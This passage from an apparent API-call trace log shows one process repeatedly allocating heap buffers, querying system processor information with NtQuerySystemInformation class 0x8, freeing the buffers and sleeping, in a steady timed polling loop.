hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.514] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0220.514] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.514] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.514] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0220.514] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.515] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.515] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0220.515] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0220.515] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.515] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0220.516] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.516] Sleep (dwMilliseconds=0x110) [0220.529] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0220.529] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.530] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.530] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0220.530] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.530] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.531] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0220.531] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.531] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.531] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0220.531] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0220.532] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.532] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0220.533] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.533] Sleep (dwMilliseconds=0x110) [0220.545] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0220.545] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.545] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.545] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0220.545] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.546] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.546] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0220.546] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.547] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.547] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0220.547] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0220.547] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.547] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0220.548] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.548] Sleep (dwMilliseconds=0x110) [0220.569] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0220.569] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.570] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.570] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0220.570] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.570] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.570] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0220.570] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.571] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.571] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0220.571] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0220.571] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.571] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0220.572] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.572] Sleep (dwMilliseconds=0x110) [0220.596] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0220.596] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.597] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.597] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0220.597] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.597] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.597] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0220.597] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.598] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.598] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0220.598] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0220.602] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.602] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0220.602] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.603] Sleep (dwMilliseconds=0x110) [0220.693] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0220.693] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.694] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.694] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0220.694] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.694] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.698] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0220.698] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.699] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.699] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0220.699] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0220.699] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.701] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0220.701] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.702] Sleep (dwMilliseconds=0x110) [0220.752] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0220.753] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.753] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.753] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0220.753] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.754] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.754] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0220.754] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.755] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.755] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0220.755] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0220.755] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.756] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0220.757] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.757] Sleep (dwMilliseconds=0x110) [0220.792] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0220.792] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.792] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.792] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0220.792] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.793] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.793] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0220.793] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.793] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.793] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0220.793] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0220.794] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.794] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0220.794] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.794] Sleep (dwMilliseconds=0x110) [0220.802] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0220.802] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.802] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.802] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0220.802] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.803] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.803] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0220.803] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.803] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.804] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0220.804] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0220.805] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.805] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0220.806] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.806] Sleep (dwMilliseconds=0x110) [0220.830] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0220.830] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.830] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.830] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0220.830] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.831] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.831] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0220.831] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.831] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.831] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0220.831] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0220.832] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.832] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0220.832] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.832] Sleep (dwMilliseconds=0x110) [0220.841] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0220.841] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.842] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.842] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0220.842] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.842] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.843] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0220.843] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.843] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.843] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0220.843] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0220.844] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.844] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0220.845] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.845] Sleep (dwMilliseconds=0x110) [0220.879] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0220.879] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.880] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.880] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0220.880] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.880] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.880] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0220.880] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.881] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.881] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0220.881] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0220.882] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.882] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0220.883] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.883] Sleep (dwMilliseconds=0x110) [0220.905] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0220.905] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.905] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.905] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0220.905] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.906] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.906] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0220.906] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.907] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.907] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0220.907] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0220.908] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.912] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0220.913] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.913] Sleep (dwMilliseconds=0x110) [0220.973] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0220.973] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.974] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.977] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0220.977] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.978] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.978] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0220.978] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.978] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.978] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0220.978] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0220.979] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.979] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0220.979] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.979] Sleep (dwMilliseconds=0x110) [0221.005] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 